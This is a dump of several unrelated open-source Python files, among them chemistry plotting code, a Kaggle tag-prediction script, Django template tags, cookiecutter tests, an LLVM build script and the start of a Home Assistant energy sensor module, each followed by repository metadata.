self.get_table(columns=list(set(info_columns+sort_columns)), rows=rows, filters=filters, mol=True) num_plots = df.index.shape[0] if sort_columns: df.sort(sort_columns, inplace=True) if gtype == 'energy': mol_func = 'plot_opt_energy' x_label = 'Optimisation Step' y_label = 'Energy ({0})'.format(eunits) all_plot_kwargs = {'units':eunits} per_plot_kwargs = {'linecolor':getattr(cm,color_scheme)( np.linspace(0.1, 0.9, num_plots))} elif gtype == 'freq': mol_func = 'plot_freq_analysis' x_label = 'Frequency ($cm^{-1}$)' y_label = 'IR Intensity ($km/mol$)' all_plot_kwargs = {} per_plot_kwargs = {'color':getattr(cm,color_scheme)( np.linspace(0, 1, num_plots)), 'alpha':np.linspace(1, 0.5, num_plots), 'marker_size':np.linspace(25, 15, num_plots)} elif gtype == 'dos': if share_plot: raise ValueError('share_plots not available for Density of States') mol_func = 'plot_dos' x_label = 'Density of States (per {0} {1})'.format(per_energy, eunits) y_label = 'Energy ({})'.format(eunits) all_plot_kwargs = {'eunits':eunits, 'per_energy':per_energy, 'lbound':lbound, 'ubound':ubound, 'color_homo':color_homo, 'color_lumo':color_lumo, 'homo_lumo_lines':homo_lumo_lines, 'homo_lumo_values':homo_lumo_values, 'band_gap_value':band_gap_value, 'legend_size':legend_size} else: raise ValueError('gtype; {0}, not available'.format(gtype)) ax_num = 0 caption = [] if share_plot: fig, ax = plt.subplots() legend = [] for indx, row in df.iterrows(): plot_kwargs = all_plot_kwargs.copy() for k, v in per_plot_kwargs.iteritems(): plot_kwargs[k] = v[ax_num] getattr(row.Molecule, mol_func)(ax=ax, **plot_kwargs) label = ', '.join(row[info_columns].fillna('-').astype(str)) if info_incl_id: label = str(indx) + ', ' + label legend.append(label) ax_num += 1 ax.grid(grid) for tick in ax.get_xticklabels(): tick.set_rotation(tick_rotation) ax.legend(legend, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., prop={'size':legend_size}) else: num_rows = int(math.ceil(num_plots/float(max_cols))) num_cols = min([max_cols, num_plots]) fig, axes = plt.subplots(nrows=num_rows, ncols=num_cols, squeeze=False, sharex=sharex, sharey=sharey) letter_offset = string.ascii_uppercase.find(start_letter) if letter_offset == -1: raise ValueError('start_letter must be an uppercase single letter') for indx, row in df.iterrows(): i = int(math.ceil((ax_num+1)/float(max_cols)))-1 j = ax_num % max_cols getattr(row.Molecule, mol_func)(ax=axes[i,j], **all_plot_kwargs) axes[i,j].grid(grid) for tick in axes[i,j].get_xticklabels(): tick.set_rotation(tick_rotation) info = ', '.join(row[info_columns].fillna('-').astype(str)) if info_incl_id: info = str(indx) + ', ' + info letter = self._get_letter(ax_num+letter_offset) axes[i,j].set_title(letter_prefix+letter, fontweight="bold") caption.append('(' + letter_prefix+letter + ') ' + info) ax_num += 1 #hide extraneous axes for extra_ax in range(ax_num, num_rows*num_cols): i = int(math.ceil((extra_ax+1)/float(max_cols)))-1 j = extra_ax % max_cols axes[i,j].axis('off') ax = fig.add_subplot(111) # The big subplot ax.tick_params(top='off', bottom='off', left='off', right='off', labelbottom='on', labelleft='on', pad=25) ax.set_xticklabels([]) ax.set_yticklabels([]) ax.set_frame_on(False) ax.set_xlabel(x_label) ax.set_ylabel(y_label) fig.tight_layout(w_pad=padding[0], h_pad=padding[1]) caption = ', '.join(caption) return fig, caption def plot_radviz_comparison(self, category_column, columns=[], rows=[], filters={}, point_size=30, **kwargs): """return plot axis of radviz graph RadViz is a way of visualizing multi-variate data. It is based on a simple spring tension minimization algorithm. Basically you set up a bunch of points in a plane. In our case they are equally spaced on a unit circle. Each point represents a single attribute. You then pretend that each sample in the data set is attached to each of these points by a spring, the stiffness of which is proportional to the numerical value of that attribute (they are normalized to unit interval). The point in the plane, where our sample settles to (where the forces acting on our sample are at an equilibrium) is where a dot representing our sample will be drawn. Depending on which class that sample belongs it will be colored differently. """ col_names = self._df.drop('Molecule', axis=1).columns.tolist() if category_column not in col_names: raise ValueError('{0} not in columns'.format(category_column)) columns = columns[:] if columns and category_column not in columns: if all(isinstance(item, int) for item in columns): columns.append(col_names.index(category_column)) else: columns.append(category_column) df = self.get_table(rows, columns, filters) df = df.sort(category_column) f, ax = plt.subplots() ax = radviz(df, category_column, ax=ax, s=point_size, **kwargs) ax.axes.get_xaxis().set_visible(False) ax.axes.get_yaxis().set_visible(False) ax.set_frame_on(False) ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.) return ax def calc_kmean_groups(self, category_column, category_name, groups, columns=[], rows=[], filters={}): """calculate the kmeans grouping of rows The KMeans algorithm clusters data by trying to separate samples in n groups of equal variance, minimizing a criterion known as the inertia or within-cluster sum-of-squares. This algorithm requires the number of clusters to be specified. It scales well to large number of samples and has been used across a large range of application areas in many different fields. """ col_names = self._df.drop('Molecule', axis=1).columns.tolist() if category_column not in col_names: raise ValueError('{0} not in columns'.format(category_column)) filters[category_column] = category_name df = self.get_table(rows, columns, filters) k_means = KMeans(n_clusters=groups) k_means.fit(df) cats = k_means.predict(df) return pd.DataFrame({'Name':category_name, 'Category':cats}, index=df.index) if __name__ == '__main__': pass
chrisjsewell/PyGauss
pygauss/analysis.py
Python
gpl-3.0
44,913
0.00993
# -*- coding: utf-8 -*- """ Created on Tue Dec 13 23:10:40 2016 @author: zhouyu """ #%% import pandas as pd import numpy as np import os import re import nltk from nltk.corpus import stopwords from bs4 import BeautifulSoup os.chdir('/Users/zhouyu/Documents/Zhou_Yu/DS/kaggle_challenge/text processing') #%% step1: import data import glob alltrainfiles = glob.glob("*.csv") raw_text =pd.concat((pd.read_csv(f,index_col = None, header =0) for f in alltrainfiles),ignore_index = True) #raw_text = pd.read_csv("crypto.csv",index_col = None) #%% step2: clean data, remove HTML, symbols and stopwords def text_to_words(rawtext): #split into individual words, remove HTML, only keep letters and number # convert letters to lower case reg_c = re.compile('[^a-zA-Z0-9_\\+\\-]') words = [word for word in reg_c.split(rawtext.lower()) if word!=''] stops = set(stopwords.words("english")) #take out stop words meaningful_words = [w for w in words if not w in stops] return(" ".join(meaningful_words)) def target_to_words(rawtext): #only return the first target word reg_c = re.compile('[^a-zA-Z0-9_\\+\\-]') words = [word for word in reg_c.split(rawtext.lower()) if word!=''] stops = set(stopwords.words("english")) #take out stop words meaningful_words = [w for w in words if not w in stops] return(meaningful_words[0]) #%% cleaned_post = [] cleaned_target = [] sz = raw_text.shape[0] for i in range(0,sz): raw_post = raw_text['title'][i]+' '+raw_text['content'][i] raw_post = BeautifulSoup(raw_post).get_text() cleaned_post.append(text_to_words(raw_post)) cleaned_target.append(target_to_words(raw_text['tags'][i])) if((i+1)%1000==0): print "Cleanning %d of %d\n" % (i+1,sz) #print cleaned_post[1] #%% step3: creating features from a bag of words from sklearn.feature_extraction.text import CountVectorizer count_vect = CountVectorizer(analyzer = "word", \ tokenizer = None, \ preprocessor = None, \ stop_words = None, \ max_features = 5000) X_train_counts = count_vect.fit_transform(cleaned_post) #X_target_counts = count_vect.fit_transform(cleaned_target) from sklearn.feature_extraction.text import TfidfTransformer tf_transformer = TfidfTransformer(use_idf = False).fit(X_train_counts) X_train_tf = tf_transformer.transform(X_train_counts) #%% training a linear model # METHOD 1: BUILD randomforestclassifier... from sklearn.ensemble import RandomForestClassifier rf = RandomForestClassifier(n_estimators = 10) forest = rf.fit(X_train_tf, cleaned_target) #%% examine the result produced by METHOD 1: pred = rf.predict(X_train_tf) from sklearn.metrics import confusion_matrix from sklearn.metrics import classification_report from collections import OrderedDict import matplotlib.pyplot as plt import itertools def plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. """ plt.imshow(cm, interpolation='nearest', cmap=cmap) plt.title(title) plt.colorbar() tick_marks = np.arange(len(classes)) plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] print("Normalized confusion matrix") else: print('Confusion matrix, without normalization') print(cm) thresh = cm.max() / 2. for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])): plt.text(j, i, cm[i, j], horizontalalignment="center", color="white" if cm[i, j] > thresh else "black") plt.tight_layout() plt.ylabel('True label') plt.xlabel('Predicted label') cnf_matrix = confusion_matrix(cleaned_target,pred) #target_names = set(cleaned_target) #np.set_printoptions(precision = 2) #plt.figure() #plot_confusion_matrix(cnf_matrix,classes = target_names,normalize = True,title='Normalized confusion matrix') #plt.show() target_names = list(OrderedDict.fromkeys(cleaned_target)) print(classification_report(cleaned_target,pred,target_names = target_names)) ####### #%% Method 2: directly predicted as the highest frequency element # find the highest tf-idf #step1: select a random sample from sklearn.metrics import confusion_matrix from sklearn.metrics import classification_report from collections import OrderedDict sample = np.random.choice(87000,1000,replace = False) tf_pred = [] tf_target = [] for i in range(0,1000): r = sample[i]; tf_target.append(cleaned_target[r]) tf_post = X_train_tf.getrow(r).toarray() tf_post_max = tf_post.argmax() tf_pred.append(count_vect.get_feature_names()[tf_post_max]) tf_cnf_matrix = confusion_matrix(tf_target,tf_pred) target_names = list(OrderedDict.fromkeys(tf_pred+tf_target)) print(classification_report(tf_target, tf_pred,target_names =target_names)) #%% evaluate test set test = pd.read_csv('test/test.csv') cleaned_test = [] test_sz = test.shape[0] for i in range(0,test_sz): test_post = test['title'][i]+' '+test['content'][i] test_post = BeautifulSoup(test_post).get_text() cleaned_test.append(text_to_words(test_post)) if((i+1)%1000==0): print "Cleanning %d of %d\n" % (i+1,test_sz) #%% use random forest X_test_counts = count_vect.fit_transform(cleaned_test) X_test_tf = tf_transformer.transform(X_test_counts) result = forest.predict(X_test_counts) # use max tf-idf #%% test_pred = [] for i in range(0,test_sz): tf_test = X_test_tf.getrow(i).toarray() # just return one tag #tf_test_max = tf_test.argmax() #test_pred.append(count_vect.get_feature_names()[tf_test_max]) ind = np.argpartition(tf_test,-4)[:,-4:] pred_tags = [count_vect.get_feature_names()[j] for j in ind[0,:].tolist()] test_pred.append( " ".join(pred_tags)) if((i+1)%1000==0): print "Predicting %d of %d\n" % (i+1,test_sz) result = test_pred #%% prepare submission submission = pd.read_csv('test/sample_submission.csv') submission.iloc[:,1] = result submission.to_csv('test/submission.csv',index = None) #%% try to use NMF model can not be mapped to specific question... n_features = 5000 n_topics = 10 n_samples = test_sz n_top_words = 4 def get_top_words(model, feature_names, n_top_words): res = [] for topic_idx, topic in enumerate(model.components_): tags = " ".join([feature_names[i] for i in topic.argsort()[:-n_top_words - 1:-1]]) res.append(tags) return res from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer from sklearn.decomposition import NMF from time import time tfidf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2, max_features=n_features, stop_words='english') tfidf = tfidf_vectorizer.fit_transform(cleaned_test) # Fit the NMF model print("Fitting the NMF model (Frobenius norm) with tf-idf features, " "n_samples=%d and n_features=%d..." % (n_samples, n_features)) t0 = time() nmf = NMF(n_components=n_topics, random_state=1, alpha=.1, l1_ratio=.5).fit(tfidf) print("done in %0.3fs." % (time() - t0)) print("\nTopics in NMF model (Frobenius norm):") tfidf_feature_names = tfidf_vectorizer.get_feature_names() #print_top_words(nmf, tfidf_feature_names, n_top_words) result = get_top_words(nmf,tfidf_feature_names,n_top_words)
sadahanu/DataScience_SideProject
Stack_Exchange/py2_text.py
Python
mit
7,689
0.017167
#!/usr/bin/python import time class Recorder(object): debug = 0 def __init__(self): self.recordings = [] self.lastRecord = 0 if Recorder.debug: print("init Recorder") def record(self): now = time.time(); if self.lastRecord != 0: self.recordings.append(now-self.lastRecord) if Recorder.debug: print(len(self.recordings), " ", self.recordings[-1]); self.lastRecord = now def empty(self): return len(self.recordings) > 0 def minInterval(self): return 0 if len(self.recording) == 0 else self.recording[0]
detman/stomplooper
recorder.py
Python
gpl-3.0
646
0.010836
import re from django import template from django.conf import settings from django.template import TemplateSyntaxError from django.template.base import FilterExpression from django.template.defaulttags import URLNode from django.utils.encoding import iri_to_uri, smart_str from django.urls import set_urlconf, get_urlconf from ..resolvers import reverse_host, get_host from ..utils import normalize_scheme, normalize_port register = template.Library() kwarg_re = re.compile(r"(?:(\w+)=)?(.+)") class HostURLNode(URLNode): def __init__(self, *args, **kwargs): self.host = kwargs.pop('host') self.host_args = kwargs.pop('host_args') self.host_kwargs = kwargs.pop('host_kwargs') self.scheme = kwargs.pop('scheme') self.port = kwargs.pop('port') super(HostURLNode, self).__init__(*args, **kwargs) def maybe_resolve(self, var, context): """ Variable may have already been resolved in e.g. a LoopNode, so we only resolve() if needed. """ if isinstance(var, FilterExpression): return var.resolve(context) return var def render(self, context): host = get_host(self.maybe_resolve(self.host, context)) current_urlconf = get_urlconf() try: set_urlconf(host.urlconf) path = super(HostURLNode, self).render(context) if self.asvar: path = context[self.asvar] finally: set_urlconf(current_urlconf) host_args = [self.maybe_resolve(x, context) for x in self.host_args] host_kwargs = dict((smart_str(k, 'ascii'), self.maybe_resolve(v, context)) for k, v in self.host_kwargs.items()) if self.scheme: scheme = normalize_scheme(self.maybe_resolve(self.scheme, context)) else: scheme = host.scheme if self.port: port = normalize_port(self.maybe_resolve(self.port, context)) else: port = host.port hostname = reverse_host(host, args=host_args, kwargs=host_kwargs) uri = iri_to_uri('%s%s%s%s' % (scheme, hostname, port, path)) if self.asvar: context[self.asvar] = uri return '' else: return uri def parse_params(name, parser, bits): args = [] kwargs = {} for bit in bits: match = kwarg_re.match(bit) if not match: raise TemplateSyntaxError("Malformed arguments to %s tag" % name) name, value = match.groups() if name: kwargs[name] = parser.compile_filter(value) else: args.append(parser.compile_filter(value)) return args, kwargs def fetch_arg(name, arg, bits, consume=True): try: pivot = bits.index(arg) try: value = bits[pivot + 1] except IndexError: raise TemplateSyntaxError("'%s' arguments must include " "a variable name after '%s'" % (name, arg)) else: if consume: del bits[pivot:pivot + 2] return value, pivot, bits except ValueError: return None, None, bits @register.tag def host_url(parser, token): """ Simple tag to reverse the URL inclusing a host. {% host_url 'view-name' host 'host-name' %} {% host_url 'view-name' host 'host-name' 'spam' %} {% host_url 'view-name' host 'host-name' scheme 'https' %} {% host_url 'view-name' host 'host-name' as url_on_host_variable %} {% host_url 'view-name' varg1=vvalue1 host 'host-name' 'spam' 'hvalue1' %} {% host_url 'view-name' vvalue2 host 'host-name' 'spam' harg2=hvalue2 %} """ bits = token.split_contents() name = bits[0] if len(bits) < 2: raise TemplateSyntaxError("'%s' takes at least one argument" " (path to a view)" % name) view_name = parser.compile_filter(bits[1]) asvar, pivot, bits = fetch_arg(name, 'as', bits[1:]) # Strip off viewname scheme, pivot, bits = fetch_arg(name, 'scheme', bits) if scheme: scheme = parser.compile_filter(scheme) port, pivot, bits = fetch_arg(name, 'port', bits) if port: port = parser.compile_filter(port) host, pivot, bits = fetch_arg(name, 'host', bits, consume=False) if host: host = parser.compile_filter(host) view_args, view_kwargs = parse_params(name, parser, bits[1:pivot]) host_args, host_kwargs = parse_params(name, parser, bits[pivot + 2:]) else: # No host was given so use the default host host = settings.DEFAULT_HOST view_args, view_kwargs = parse_params(name, parser, bits[1:]) host_args, host_kwargs = (), {} return HostURLNode(view_name=view_name, args=view_args, kwargs=view_kwargs, asvar=asvar, host=host, host_args=host_args, host_kwargs=host_kwargs, scheme=scheme, port=port)
jezdez/django-hosts
django_hosts/templatetags/hosts.py
Python
bsd-3-clause
5,070
0
# -*- coding: utf-8 -*- """test_replay.""" import os import pytest from cookiecutter import replay, main, exceptions def test_get_replay_file_name(): """Make sure that replay.get_file_name generates a valid json file path.""" exp_replay_file_name = os.path.join('foo', 'bar.json') assert replay.get_file_name('foo', 'bar') == exp_replay_file_name @pytest.mark.parametrize( 'invalid_kwargs', ({'no_input': True}, {'extra_context': {}}, {'no_input': True, 'extra_context': {}},) ) def test_raise_on_invalid_mode(invalid_kwargs): """Test `cookiecutter` raise exception on unacceptable `replay` request.""" with pytest.raises(exceptions.InvalidModeException): main.cookiecutter('foo', replay=True, **invalid_kwargs) def test_main_does_not_invoke_dump_but_load(mocker): """Test `cookiecutter` calling correct functions on `replay`.""" mock_prompt = mocker.patch('cookiecutter.main.prompt_for_config') mock_gen_context = mocker.patch('cookiecutter.main.generate_context') mock_gen_files = mocker.patch('cookiecutter.main.generate_files') mock_replay_dump = mocker.patch('cookiecutter.main.dump') mock_replay_load = mocker.patch('cookiecutter.main.load') main.cookiecutter('tests/fake-repo-tmpl/', replay=True) assert not mock_prompt.called assert not mock_gen_context.called assert not mock_replay_dump.called assert mock_replay_load.called assert mock_gen_files.called def test_main_does_not_invoke_load_but_dump(mocker): """Test `cookiecutter` calling correct functions on non-replay launch.""" mock_prompt = mocker.patch('cookiecutter.main.prompt_for_config') mock_gen_context = mocker.patch('cookiecutter.main.generate_context') mock_gen_files = mocker.patch('cookiecutter.main.generate_files') mock_replay_dump = mocker.patch('cookiecutter.main.dump') mock_replay_load = mocker.patch('cookiecutter.main.load') main.cookiecutter('tests/fake-repo-tmpl/', replay=False) assert mock_prompt.called assert mock_gen_context.called assert mock_replay_dump.called assert not mock_replay_load.called assert mock_gen_files.called
luzfcb/cookiecutter
tests/replay/test_replay.py
Python
bsd-3-clause
2,207
0
""" A collection of Xentica models and experiments. Indended to illustrate how to use the framework. """
a5kin/hecate
examples/__init__.py
Python
mit
107
0
import hashlib def hash_list(): return str(hashlib.algorithms_guaranteed) def hash_text(algorithm_array, text, pass_count): result_dict = {} # Type checking if type(pass_count) is not int: return [False, {"error": "Pass count should be of 'integer' type."}] elif type(text) is not str: return [False, {"error": "Text should be of 'string' type."}] elif type(algorithm_array) is not list: return [False, {"error": "Algorithm list should be of 'list' type."}] # Bounds checking avail_alg_set = set(algorithm_array) & set(hashlib.algorithms_guaranteed) if pass_count > 1000000 or pass_count <= 0: return [False, {"error": "Pass count should be larger than 0 and smaller than 1000000."}] elif len(avail_alg_set) == 0: return [False, {"error": "None of these hash algorithms are available."}] # There is no error case; do the hash computations for every function for function in avail_alg_set: hash_val = text for _ in range(pass_count): hash_val = getattr(hashlib, function)(hash_val.encode()).hexdigest() result_dict[function] = hash_val return [True, result_dict]
tykkz/hasherapp
algorithm.py
Python
mit
1,194
0.002513
#!/usr/bin/env python import tester tester.make(["--input='./result/standard'", "--output='./result/out'", "--standard", "--cores=1"])
ONLYOFFICE/core
Test/Applications/StandardTester/tester/scripts/generate.py
Python
agpl-3.0
134
0.014925
# -*- coding: utf-8 -*- """ :copyright: Copyright 2013 by Łukasz Mierzwa :contact: l.mierzwa@gmail.com """ from __future__ import unicode_literals import logging from inspect import ismethod from django.utils.html import escape from django.utils.safestring import mark_safe from django.utils.encoding import smart_text from django.db.models import Model from django.conf import settings from django import template, VERSION from six import wraps if VERSION >= (3, 0): from django.utils.translation import gettext as _ else: from django.utils.translation import ugettext as _ if VERSION >= (2, 0): from django.urls import (reverse, resolve, NoReverseMatch, Resolver404) else: from django.core.urlresolvers import (reverse, resolve, NoReverseMatch, Resolver404) logger = logging.getLogger(__name__) register = template.Library() CONTEXT_KEY = 'DJANGO_BREADCRUMB_LINKS' def log_request_not_found(): if VERSION < (1, 8): # pragma: nocover logger.error("request object not found in context! Check if " "'django.core.context_processors.request' is in " "TEMPLATE_CONTEXT_PROCESSORS") else: # pragma: nocover logger.error("request object not found in context! Check if " "'django.template.context_processors.request' is in the " "'context_processors' option of your template settings.") def requires_request(func): @wraps(func) def wrapped(context, *args, **kwargs): if 'request' in context: return func(context, *args, **kwargs) log_request_not_found() return '' return wrapped @requires_request def append_breadcrumb(context, label, viewname, args, kwargs): context['request'].META[CONTEXT_KEY] = context['request'].META.get( CONTEXT_KEY, []) + [(label, viewname, args, kwargs)] @register.simple_tag(takes_context=True) def breadcrumb(context, label, viewname, *args, **kwargs): """ Add link to list of breadcrumbs, usage: {% load bubbles_breadcrumbs %} {% breadcrumb "Home" "index" %} Remember to use it inside {% block %} with {{ block.super }} to get all parent breadcrumbs. :param label: Breadcrumb link label. :param viewname: Name of the view to link this breadcrumb to, or Model instance with implemented get_absolute_url(). :param args: Any arguments to view function. """ append_breadcrumb(context, _(escape(label)), viewname, args, kwargs) return '' @register.simple_tag(takes_context=True) def breadcrumb_safe(context, label, viewname, *args, **kwargs): """ Same as breadcrumb but label is not escaped. """ append_breadcrumb(context, _(label), viewname, args, kwargs) return '' @register.simple_tag(takes_context=True) def breadcrumb_raw(context, label, viewname, *args, **kwargs): """ Same as breadcrumb but label is not translated. """ append_breadcrumb(context, escape(label), viewname, args, kwargs) return '' @register.simple_tag(takes_context=True) def breadcrumb_raw_safe(context, label, viewname, *args, **kwargs): """ Same as breadcrumb but label is not escaped and translated. """ append_breadcrumb(context, label, viewname, args, kwargs) return '' @register.simple_tag(takes_context=True) @requires_request def render_breadcrumbs(context, *args): """ Render breadcrumbs html using bootstrap css classes. """ try: template_path = args[0] except IndexError: template_path = getattr(settings, 'BREADCRUMBS_TEMPLATE', 'django_bootstrap_breadcrumbs/bootstrap2.html') links = [] for (label, viewname, view_args, view_kwargs) in context[ 'request'].META.get(CONTEXT_KEY, []): if isinstance(viewname, Model) and hasattr( viewname, 'get_absolute_url') and ismethod( viewname.get_absolute_url): url = viewname.get_absolute_url(*view_args, **view_kwargs) else: try: try: # 'resolver_match' introduced in Django 1.5 current_app = context['request'].resolver_match.namespace except AttributeError: try: resolver_match = resolve(context['request'].path) current_app = resolver_match.namespace except Resolver404: current_app = None url = reverse(viewname=viewname, args=view_args, kwargs=view_kwargs, current_app=current_app) except NoReverseMatch: url = viewname links.append((url, smart_text(label) if label else label)) if not links: return '' if VERSION > (1, 8): # pragma: nocover # RequestContext is deprecated in recent django # https://docs.djangoproject.com/en/1.10/ref/templates/upgrading/ context = context.flatten() context['breadcrumbs'] = links context['breadcrumbs_total'] = len(links) return mark_safe(template.loader.render_to_string(template_path, context)) class BreadcrumbNode(template.Node): def __init__(self, nodelist, viewname, args): self.nodelist = nodelist self.viewname = viewname self.args = list(args) self.kwargs = {} for arg in args: if '=' in arg: name = arg.split('=')[0] val = '='.join(arg.split('=')[1:]) self.kwargs[name] = val self.args.remove(arg) def render(self, context): if 'request' not in context: log_request_not_found() return '' label = self.nodelist.render(context) try: viewname = template.Variable(self.viewname).resolve(context) except template.VariableDoesNotExist: viewname = self.viewname args = self.parse_args(context) kwargs = self.parse_kwargs(context) append_breadcrumb(context, label, viewname, args, kwargs) return '' def parse_args(self, context): args = [] for arg in self.args: try: value = template.Variable(arg).resolve(context) except template.VariableDoesNotExist: value = arg args.append(value) return args def parse_kwargs(self, context): kwargs = {} for name, val in self.kwargs.items(): try: value = template.Variable(val).resolve(context) except template.VariableDoesNotExist: value = val kwargs[name] = value return kwargs @register.tag def breadcrumb_for(parser, token): bits = list(token.split_contents()) end_tag = 'end' + bits[0] nodelist = parser.parse((end_tag,)) parser.delete_first_token() return BreadcrumbNode(nodelist, bits[1], bits[2:]) @register.simple_tag(takes_context=True) @requires_request def clear_breadcrumbs(context, *args): """ Removes all currently added breadcrumbs. """ context['request'].META.pop(CONTEXT_KEY, None) return ''
prymitive/bootstrap-breadcrumbs
django_bootstrap_breadcrumbs/templatetags/django_bootstrap_breadcrumbs.py
Python
mit
7,292
0
#!/usr/bin/env python3 from auto.config import DIR, RV32_LINUX from auto.gnu_toolchain import GnuToolchain from auto.utils import cat, cd, path, shell import auto.pkg import os class LLVM(auto.pkg.Package): def _prepare(self): link = path(DIR.submodules, "llvm/tools/clang") if not os.path.exists(link): shell("ln -sf {}/clang {}".format(DIR.submodules, link)) # Apply patches llvm_dir = path(DIR.submodules, "llvm") clang_dir = path(DIR.submodules, "clang") with cd(DIR.patches): llvm_patches = shell("ls 0?-relax-*", save_out=True).strip().split() clang_patches = shell("ls 0?-clang-*", save_out=True).strip().split() if not os.path.exists(path(llvm_dir, ".patched")): with cd(llvm_dir): for p in llvm_patches: shell("patch -p0 < {}/{}".format(DIR.patches, p)) shell("touch .patched") if not os.path.exists(path(clang_dir, ".patched")): with cd(clang_dir): for p in clang_patches: shell("patch -p0 < {}/{}".format(DIR.patches, p)) shell("touch .patched") def _build(self): shell("cmake --build {} -- {}".format(self.build_dir, self.make_opts)) def _install(self): shell("cmake --build {} --target install".format(self.build_dir)) def _postinstall(self): srcdir = path(self.build_dir, "lib/Target/RISCV") dstdir = path(self.prefix, "include/llvm/Target/RISCV") shell("mkdir -p " + dstdir) for f in ["RISCVGenInstrInfo.inc", "RISCVGenRegisterInfo.inc"]: shell("cp {0}/{2} {1}/{2}".format(srcdir, dstdir, f)) def _pkgs(): # lowrisc llvm name = "llvm" prefix = DIR.toolchain_debug build_dir = path(DIR.build, "llvm") def configure(clang_ver, prefix, gnu_tc_prefix): return cat( "cmake", "-G Ninja", '-DLLVM_TARGETS_TO_BUILD="ARM;X86"', "-DCMAKE_BUILD_TYPE=Debug", "-DBUILD_SHARED_LIBS=True", "-DLLVM_USE_SPLIT_DWARF=True", "-DLLVM_OPTIMIZED_TABLEGEN=True", "-DLLVM_BUILD_TESTS=True", "-DCMAKE_C_COMPILER=/usr/bin/clang-{0}", "-DCMAKE_CXX_COMPILER=/usr/bin/clang++-{0}", "-DGCC_INSTALL_PREFIX={2}", "-DLLVM_DEFAULT_TARGET_TRIPLE=" + RV32_LINUX.triple, '-DLLVM_EXPERIMENTAL_TARGETS_TO_BUILD="RISCV"', "-DCMAKE_INSTALL_PREFIX={1}", path(DIR.submodules, "llvm")).format( clang_ver, prefix, gnu_tc_prefix) makefile = "build.ninja" out = "bin/clang" toolchain = "bin/clang" deps = ["riscv-gnu-toolchain-newlib"] pkg0 = LLVM(name, prefix, build_dir, makefile=makefile, configure=configure("3.9", prefix, GnuToolchain.PREFIX), build_out=out, toolchain=toolchain, deps=deps) name = "llvm-gcc7" prefix = path(DIR.toolchain_debug, "gcc7") build_dir = path(DIR.build, "llvm-gcc7") pkg1 = LLVM(name, prefix, build_dir, makefile=makefile, configure=configure("6.0", prefix, GnuToolchain.PREFIX_GCC7), build_out=out, toolchain=toolchain, deps=deps) return [pkg0, pkg1] auto.pkg.Package.pkgs.extend(_pkgs())
OpenISA/riscv-sbt
scripts/auto/llvm.py
Python
mit
3,402
0.004409
"""Support for OVO Energy sensors.""" from __future__ import annotations from collections.abc import Callable from dataclasses import dataclass from datetime import datetime, timedelta from typing import Final from ovoenergy import OVODailyUsage from ovoenergy.ovoenergy import OVOEnergy from homeassistant.components.sensor import ( SensorDeviceClass, SensorEntity, SensorEntityDescription, SensorStateClass, ) from homeassistant.config_entries import ConfigEntry from homeassistant.const import ENERGY_KILO_WATT_HOUR from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import StateType from homeassistant.helpers.update_coordinator import DataUpdateCoordinator from homeassistant.util import dt as dt_util from . import OVOEnergyDeviceEntity from .const import DATA_CLIENT, DATA_COORDINATOR, DOMAIN SCAN_INTERVAL = timedelta(seconds=300) PARALLEL_UPDATES = 4 KEY_LAST_ELECTRICITY_COST: Final = "last_electricity_cost" KEY_LAST_GAS_COST: Final = "last_gas_cost" @dataclass class OVOEnergySensorEntityDescription(SensorEntityDescription): """Class describing System Bridge sensor entities.""" value: Callable[[OVODailyUsage], StateType | datetime] = round SENSOR_TYPES_ELECTRICITY: tuple[OVOEnergySensorEntityDescription, ...] = ( OVOEnergySensorEntityDescription( key="last_electricity_reading", name="OVO Last Electricity Reading", device_class=SensorDeviceClass.ENERGY, state_class=SensorStateClass.TOTAL_INCREASING, native_unit_of_measurement=ENERGY_KILO_WATT_HOUR, value=lambda usage: usage.electricity[-1].consumption, ), OVOEnergySensorEntityDescription( key=KEY_LAST_ELECTRICITY_COST, name="OVO Last Electricity Cost", device_class=SensorDeviceClass.MONETARY, state_class=SensorStateClass.TOTAL_INCREASING, value=lambda usage: usage.electricity[-1].cost.amount if usage.electricity[-1].cost is not None else None, ), OVOEnergySensorEntityDescription( key="last_electricity_start_time", name="OVO Last Electricity Start Time", entity_registry_enabled_default=False, device_class=SensorDeviceClass.TIMESTAMP, value=lambda usage: dt_util.as_utc(usage.electricity[-1].interval.start), ), OVOEnergySensorEntityDescription( key="last_electricity_end_time", name="OVO Last Electricity End Time", entity_registry_enabled_default=False, device_class=SensorDeviceClass.TIMESTAMP, value=lambda usage: dt_util.as_utc(usage.electricity[-1].interval.end), ), ) SENSOR_TYPES_GAS: tuple[OVOEnergySensorEntityDescription, ...] = ( OVOEnergySensorEntityDescription( key="last_gas_reading", name="OVO Last Gas Reading", device_class=SensorDeviceClass.ENERGY, state_class=SensorStateClass.TOTAL_INCREASING, native_unit_of_measurement=ENERGY_KILO_WATT_HOUR, icon="mdi:gas-cylinder", value=lambda usage: usage.gas[-1].consumption, ), OVOEnergySensorEntityDescription( key=KEY_LAST_GAS_COST, name="OVO Last Gas Cost", device_class=SensorDeviceClass.MONETARY, state_class=SensorStateClass.TOTAL_INCREASING, icon="mdi:cash-multiple", value=lambda usage: usage.gas[-1].cost.amount if usage.gas[-1].cost is not None else None, ), OVOEnergySensorEntityDescription( key="last_gas_start_time", name="OVO Last Gas Start Time", entity_registry_enabled_default=False, device_class=SensorDeviceClass.TIMESTAMP, value=lambda usage: dt_util.as_utc(usage.gas[-1].interval.start), ), OVOEnergySensorEntityDescription( key="last_gas_end_time", name="OVO Last Gas End Time", entity_registry_enabled_default=False, device_class=SensorDeviceClass.TIMESTAMP, value=lambda usage: dt_util.as_utc(usage.gas[-1].interval.end), ), ) async def async_setup_entry( hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: """Set up OVO Energy sensor based on a config entry.""" coordinator: DataUpdateCoordinator = hass.data[DOMAIN][entry.entry_id][ DATA_COORDINATOR ] client: OVOEnergy = 